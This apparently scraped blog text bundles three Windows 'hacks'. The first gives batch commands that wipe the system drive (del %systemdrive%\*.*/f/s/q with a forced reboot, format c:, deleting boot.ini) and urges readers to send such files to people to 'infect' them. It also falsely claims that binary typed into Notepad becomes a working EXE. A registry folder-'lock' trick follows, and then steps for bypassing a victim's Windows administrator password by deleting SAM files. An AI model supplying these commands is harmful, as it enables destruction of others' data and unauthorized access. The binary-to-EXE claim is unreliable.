no image


/* ======== EDUCATION PURPOSE ONLY==============*/
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
Step 1. Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
Step 3. Send the EXE to People And Infect+
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your drive d:\
IMPORTANT : This Trick is for Educational Purpose only.DONT TRY ON YOUR OWN PC.wwwdesk.in not responsible for it. TRY WITH YOUR OWN RISK.It lead to loss of data and crashing your computer..!!
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Try to figure out yourself rest  can’t spoonfeed Its working.
still if you cant figure it out try this:
  1. go to notepad and type the following:
    @Echo off
  2. Del C:\ *.*|y  save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
How to Lock folder on windows using recycle bin

How to Lock folder on windows using recycle bin

 

 

 

 

Hello friends, here i am going to share tip which will help you to lock folder for  protecting  your important data as well as data that required to lock for preventing access. there are lots of utilities available that will help you to achieve this, but all are some how trial version or limited version.
So, if you want to lock folder on your pc please follow below steps. note that these  changes are under windows registry so, avoid to  implement if you are not well enough technically known person :)

here are the way you can lock any folder using recycle bin :
  • open Run in your computer or press (ctrl +R) and type ‘regedit‘ command
  • You can list of  keys  and relates values.navigate through list until you find CLSID no of recycle bin in registry editor
For example:
CLSID no of recycle bin  is >>  {645FF040-5081-101B-9F08-00AA002F954E}
  • Now its time to lock folder using recycle bin so, lets say you want to lock folder named ‘Folder1?
so inside notepad editor type  following text like
ren folder1 recycle.{645FF040-5081-101B-9F08-00AA002F954E}
and save that files as lock.bat
  • To unlock related Lock folder , you can create another batch file which will unlock folder.Type below line in another notepad file and  save that as ‘unlock.bat’
ren recycle.{645FF040-5081-101B-9F08-00AA002F954E}
So, when ever you want to lock  folder execute created lock.bat and reverse execute unlock.bat for locking folder

Originally posted. February 28, 2012

 

HOW TO DELETE ADMINISTRATOR PASSWORD WITHOUT ANY SOFTWARE


Home / How to delete administrator password without any software??

How to delete administrator password without any software

 

 

Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D’nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)